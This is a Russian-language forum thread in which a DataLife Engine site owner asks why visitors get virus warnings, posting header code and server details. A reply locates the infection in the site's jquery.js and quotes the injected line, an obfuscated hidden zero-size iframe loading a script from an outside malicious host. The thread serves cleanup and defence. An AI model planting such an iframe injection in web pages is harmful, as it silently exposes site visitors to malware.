Перейти к публикации

Вредоносный код


Рекомендованные сообщения

Версия DLE стоят 9.3. Из сторонних модулей только sblock. Раньше взламывали сайт, размещали в статьях <script>, в шапке размещали, но все это было легко диагностируемо и как правило помогала свежее обновление программы. Сейчас столкнулся со странной проблемой, при перемещении по сайту или админке, постоянно всплывает что на сайте вирусяка - 20110727-o392-16kb.jpg, просмотрел несколько раз код, уберал все script вообще, не помогало. Убрал тэг - {headers} вирусяка пропадает с клиентской части сайта. В выводимом коде из {headers} нет ни чего криминального, ради эксперимента удалил из engine.php код

/*

=====================================================

 Вывод заголовка страницы 

=====================================================

*/

$titl_e = '';

$nam_e = '';

$rss_url = '';


if ($do == "cat" and $category != '' and $subaction == '') {

...

$metatags = <<<HTML

<meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" />

<title>{$metatags['title']} </title>

<meta name="description" content="{$metatags['description']}" />

<meta name="keywords" content="{$metatags['keywords']}" />

<meta name="robots" content="all" />

<meta name="revisit-after" content="1 days" />

<link rel="search" type="application/opensearchdescription+xml" href="{$config['http_home_url']}engine/opensearch.php" title="{$config['home_title']}" />

HTML;


if ($config['allow_rss']) $metatags .= <<<HTML


<link rel="alternate" type="application/rss+xml" title="{$rss_title}" href="{$rss_url}" />

HTML;

проблема не исчезла. Подскажите куда и где копать?

Версия DataLife Engine: 9.3

Тип лицензии скрипта: Лицензия активирована

Режим работы сайта: Включен

Операционная система: Linux 2.6.18-194.17.4.el5

Версия PHP: 5.2.14

Версия MySQL: 5.0.77-log MySQLi

Информация о GD: GD Version: bundled (2.0.34 compatible), FreeType Support: Enabled, FreeType Linkage: with freetype, T1Lib Support: Disabled, GIF Read Support: Enabled, GIF Create Support: Enabled, JPG Support: Enabled, PNG Support: Enabled, WBMP Support: Enabled, XPM Support: Disabled, XBM Support: Enabled, JIS-mapped Japanese Font Support: Disabled,

Module mod_rewrite Неопределено

Безопасный режим: Выключен

Выделено оперативной памяти: 256M

Отключенные функции: Неопределено

Максимальный размер загружаемого файла: 1 Gb

Размер свободного места на диске: 629,71 Gb

Изменено пользователем kamwork
Ссылка на сообщение
Поделиться на других сайтах

зараза спряталась тут

http://www.pokushay.ru/engine/classes/js/jquery.js

в конце файла ифрейм

document.write('<i'+'frame sr'+'c="http://filtrated.in/wu5y3/07.php" width="0" height="0" frameborder="0">'+'</'+'ifram'+'e>');

Ссылка на сообщение
Поделиться на других сайтах

Благодарю.. Эти файлы я менял 2а дня назад, когда вылезла подобная проблема, просто тогда я в них ни чего не нашел, и списал это на какой то глюк. Через два дня повтор. Сейчас сменил пароли.

Скажите, если на сайт залит шелл, то встроенный антивирус должен показать его ведь? Т.к. это лишний файл?

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...